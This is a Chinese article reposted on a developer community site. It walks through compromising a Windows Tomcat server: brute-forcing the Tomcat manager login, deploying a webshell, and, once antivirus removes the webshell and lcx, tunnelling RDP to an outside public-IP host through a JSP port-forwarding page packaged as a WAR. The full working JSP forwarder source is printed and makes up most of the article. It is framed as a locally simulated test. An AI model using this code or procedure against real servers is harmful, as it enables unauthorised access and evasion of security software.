AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

通过JSP端口转发拿下服务器权限

2023-09-30 84
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 通过JSP端口转发拿下服务器权限

这篇文章是@欧根亲王号师傅19年投稿发在星球的,经他同意转发至公众号,内容比较基础。


记得他当时是在本地模拟的一个实战场景来做的这个测试实验(绕过安全防护进行转发)。


0x01 环境简要

目标主机:Widnows

目标防护软件:Antimalware

目标环境:JSP,Tomcat,Apache


本地主机:Windows、Kali

所需工具:Aapache爆破工具,Lcx,JSP代码,公网IP主机一个


所遇见问题:lcx被杀,webshell被杀


0x02 进攻说明

一、爆破登录口令

爆破Tomcat Web Application Manager,这里不做深入说明,大家都懂的


二、上传webshell

由于服务器上防护软件问题,上传的webshell被杀,lcx工具被杀,这里采取以jsp转发端口的形式来绕过


三、准备jsp页面的war包

使用kali把准备好的jsp页面打包,进入jsp页面目录下执行以下命令打包

    jar -cvf aces.war

    四、通过已有webshell创建用户名密码


    五、通过后台部署war包

    六、设置lcx监听本地端口并转发

    使用lcx监听本地55并转发到3399端口上

    七、访问jsp文件,并设置相关转发参数

      参数说明:
lip=127.0.0.1lp=需要转发的本地端口
rip=公网监听IP
rp=公网IP监听的端口号
m=转发的模式


      0x03 验证

      成功登录,自此本次实验结束


      0x04 JSP源码

      <%@page pageEncoding="GBK"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.net.*"%>
<%
/*code by KingX*/
class KPortTran {
  public void listen(String port1, String port2) {
    ServerSocket listenServerSocket = null;
    ServerSocket outServerSocket = null;
    try {
      listenServerSocket = new ServerSocket(Integer.parseInt(port1));
      outServerSocket = new ServerSocket(Integer.parseInt(port2));
    } catch (NumberFormatException e) {
    } catch (IOException e) {
    }
    Socket listenSocket = null;
    Socket outSocket = null;
    try {
      while (true) {  
        listenSocket = listenServerSocket.accept();
        outSocket = outServerSocket.accept();
        new tranThread(outSocket, listenSocket).start();
        new tranThread(listenSocket, outSocket).start();
        Thread.sleep(200);
      }
    } catch (Exception e) {  
    }
  }
  public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {
    InetAddress src = InetAddress.getByName(srcIP);
    InetAddress dest = InetAddress.getByName(targetIP);
    int p1 = Integer.parseInt(port1);
    int p2 = Integer.parseInt(port2);
    new Server(src, p2, dest, p1, true);
  }
  public void tran(String srcIP, String port1, String targetIP, String port2)
      throws NumberFormatException, IOException {
    InetAddress src = InetAddress.getByName(srcIP);
    InetAddress dest = InetAddress.getByName(targetIP);
    int p1 = Integer.parseInt(port1);
    int p2 = Integer.parseInt(port2);
    new Server(src, p1, dest, p2, false);
  }
class tranThread extends Thread {
  Socket in;
  Socket out;
  InputStream is;
  OutputStream os;
  public tranThread(Socket in, Socket out) throws IOException {
    this.is = in.getInputStream();
    this.os = out.getOutputStream();
    this.in = in;
    this.out = out;
  }
  private void closeSocket() {
    try {
      is.close();
      os.close();
      in.close();
      out.close();
    } catch (IOException e) {
    }
  }
  @Override
  public void run() {
    super.run();
    byte[] buffer = new byte[4096];
    int len = -1;
    try {
      while (true) {
        if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {
          break;
        } else {
          os.write(buffer, 0, len);
          os.flush();  
        }
      }
    } catch (IOException e) {
      closeSocket();
    } finally {
      closeSocket();
    }
  }
}
class Server extends Thread {
  InetAddress src;
  InetAddress dest;
  int p1, p2;
  boolean reverse = false;
  public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,
      int targetPort, boolean flag) {
    this.src = srcIP;
    this.dest = targetIP;
    this.p1 = srcPort;
    this.p2 = targetPort;
    this.reverse = flag;
    start();
  }
  @Override
  public void run() {
    super.run();
    if (reverse) {
      try {
        Socket s = new Socket(src, p1);
        Socket s2 = new Socket(dest, p2);
        new tranThread(s, s2).start();
        new tranThread(s2, s).start();
        while (true) {
          if (s2.isClosed() || s.isClosed()) {
            if (s2.isClosed()) {
              s2 = new Socket(dest, p2);
            }
            if (s.isClosed()) {
              s = new Socket(src, p1);
            }
            new tranThread(s, s2).start();
            new tranThread(s2, s).start();
          }
          Thread.sleep(1000);
        }
      } catch (IOException e) {
      } catch (InterruptedException e) {
      }
    } else {
      ServerSocket ss;
      try {
        ss = new ServerSocket(p1, 5, src);
        while (true) {
          Socket s = ss.accept();
          Socket s2 = new Socket(dest, p2);
          new tranThread(s, s2).start();
          new tranThread(s2, s).start();
        }
      } catch (IOException e) {
        e.printStackTrace();
      }
    }
  }
}
}
%>
<%
final String localIP = request.getParameter("lip");
final String localPort = request.getParameter("lp");
final String localPort2 = request.getParameter("lp2");
final String remoteIP =request.getParameter("rip");
final String remotePort =request.getParameter("rp");
final String mode =request.getParameter("m");
KPortTran pt = new KPortTran();
if (mode.equals("tran")) {
  pt.tran(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("slave")) {
  pt.slave(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("listen")) {
  pt.listen(localPort, localPort2);
}
%>
      文章标签:
      Java
      应用服务中间件
      数据安全/隐私保护
      Apache
      安全
      关键词:
      云服务器 ECS jsp
      端口服务器
      端口云服务器 ECS
      云服务器 ECS权限
      jsp服务器
      潇湘信安
      目录
      相关文章
      聚优云惠
      |
      4月前
      |
      弹性计算 应用服务中间件 Linux
      阿里云服务器开放端口完整图文教程
      笔者近期开发完成的服务端程序部署在阿里云的ECS云服务器上面,一些应用程序配置文件需要设置监听的端口(如Tomcat的8080、443端口等),虽然通过CentOs 7系统的的「防火墙」开放了对应的端口号,任然无法访问端口号对应的应用程序,后面了解到原来还需要设置云服务器的「安全组规则」,开放相应的端口权限,服务端的接口才能真正开放。
      聚优云惠
      689 1
      阿里云服务器开放端口完整图文教程
      东方睿赢
      |
      3月前
      |
      缓存 安全 Java
      Java服务器端技术:Servlet与JSP的集成与扩展
      Java服务器端技术:Servlet与JSP的集成与扩展
      东方睿赢
      33 3
      嘟嘟嘟嘟嘟嘟
      |
      4月前
      |
      弹性计算 运维 数据安全/隐私保护
      云服务器 ECS产品使用问题之如何更改服务器的IP地址或端口号
      云服务器ECS(Elastic Compute Service)是各大云服务商阿里云提供的一种基础云计算服务,它允许用户租用云端计算资源来部署和运行各种应用程序。以下是一个关于如何使用ECS产品的综合指南。
      嘟嘟嘟嘟嘟嘟
      66 7
      东方睿赢
      |
      3月前
      |
      前端开发 安全 Java
      在Java服务器端开发的浩瀚宇宙中,Servlet与JSP犹如两颗璀璨的明星,它们联袂登场,共同编织出动态网站的绚丽篇章。
      在Java服务器端开发的浩瀚宇宙中,Servlet与JSP犹如两颗璀璨的明星,它们联袂登场,共同编织出动态网站的绚丽篇章。
      东方睿赢
      28 0
      路边两盏灯
      |
      3月前
      |
      缓存 NoSQL 网络安全
      【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
      【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
      路边两盏灯
      40 0
      香吧香
      |
      4月前
      |
      网络协议 Linux Unix
      面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
      面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
      香吧香
      123 0
      面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
      国中之林
      |
      3月前
      |
      网络协议
      【qt】TCP的监听 (设置服务器IP地址和端口号)
      【qt】TCP的监听 (设置服务器IP地址和端口号)
      国中之林
      207 0
      爱你三千遍斯塔克
      |
      4月前
      若依修改,若依部署在本地运行时的注意事项,后端连接了服务器,本地的vue.config.js要先改成localhost:端口号与后端匹配,部署的时候再改公网IP:端口号
      若依修改,若依部署在本地运行时的注意事项,后端连接了服务器,本地的vue.config.js要先改成localhost:端口号与后端匹配,部署的时候再改公网IP:端口号
      爱你三千遍斯塔克
      156 1
      爱你三千遍斯塔克
      |
      4月前
      |
      网络协议 Linux
      云服务器内部端口占用,9090端口已经存在了,如何关闭,Linux查询端口,查看端口,端口查询,关闭端口写法-netstat -tuln,​fuser -k 3306/tcp​
      云服务器内部端口占用,9090端口已经存在了,如何关闭,Linux查询端口,查看端口,端口查询,关闭端口写法-netstat -tuln,​fuser -k 3306/tcp​
      爱你三千遍斯塔克
      282 0
      我是暴发户
      |
      7天前
      |
      机器学习/深度学习 人工智能 弹性计算
      什么是阿里云GPU云服务器?GPU服务器优势、使用和租赁费用整理
      阿里云GPU云服务器提供强大的GPU算力,适用于深度学习、科学计算、图形可视化和视频处理等多种场景。作为亚太领先的云服务提供商,阿里云的GPU云服务器具备灵活的资源配置、高安全性和易用性,支持多种计费模式,帮助企业高效应对计算密集型任务。
      我是暴发户
      41 6

      热门文章

      最新文章

    • 1
      Curl指定源端口访问网站
    • 2
      阿里云ECS Ubuntu 实例开放防火墙端口仍无法访问问题解决(安全组规则应用)
    • 3
      关于win7 80端口被占用
    • 4
      windows下常查看端口占用方法总结
    • 5
      联想K3全系,救黑砖(只要手机链接电脑有端口识别就能恢复正常)
    • 6
      windows2008 RDP修改默认端口
    • 7
      Windows Server 2008企业64位版防火墙添加端口的方法
    • 8
      这个Windows解决端口占用方法,真香!
    • 9
      linux配置防火墙 Centos7下 添加 端口白名单
    • 10
      备忘:修改windows远程桌面端口
    • 1
      JSP 教程 之 JSP 生命周期 3
      50
    • 2
      JSP 教程 之 JSP 生命周期 2
      41
    • 3
      JSP 教程 之 JSP 生命周期 1
      47
    • 4
      JSP 教程 之 JSP 结构 1
      36
    • 5
      JSP 教程 之 Eclipse JSP/Servlet 环境搭建 1
      98
    • 6
      JSP 教程 之 JSP 开发环境搭建 4
      29
    • 7
      【毕业设计】基于SSM++jsp的的购物商城系统
      104
    • 8
      【毕业设计】基于SSM++jsp的班主任助理系统
      53
    • 9
      JSP 教程 之 JSP 开发环境搭建 3
      37
    • 10
      JSP 教程 之 JSP 开发环境搭建 2
      48

      • 相关课程

      更多
    • ECS上云入门三部曲
    • 服务器硬件基础
    • Linux Web服务器Nginx搭建与配置
    • 7天玩转云服务器
    • 云服务器选型、迁云最佳实践
    • 云服务器ECS基本操作

      • 相关电子书

      更多
    • 如何运维千台以上游戏云服务器
    • 网站/服务器取证 实践与挑战
    • ECS块储存产品全面解析

      • 相关实验场景

      更多
    • 使用ECS和RDS搭建个人博客
    • 利用云备份Cloud Backup实现ECS文件备份
    • 基于ECS搭建FTP服务
    • 基于ECS和NAS搭建个人网盘
    • 使用ECS和OSS搭建个人网盘
    • 基于ECS搭建云上博客
      • 下一篇
      阿里云OSS设置跨域访问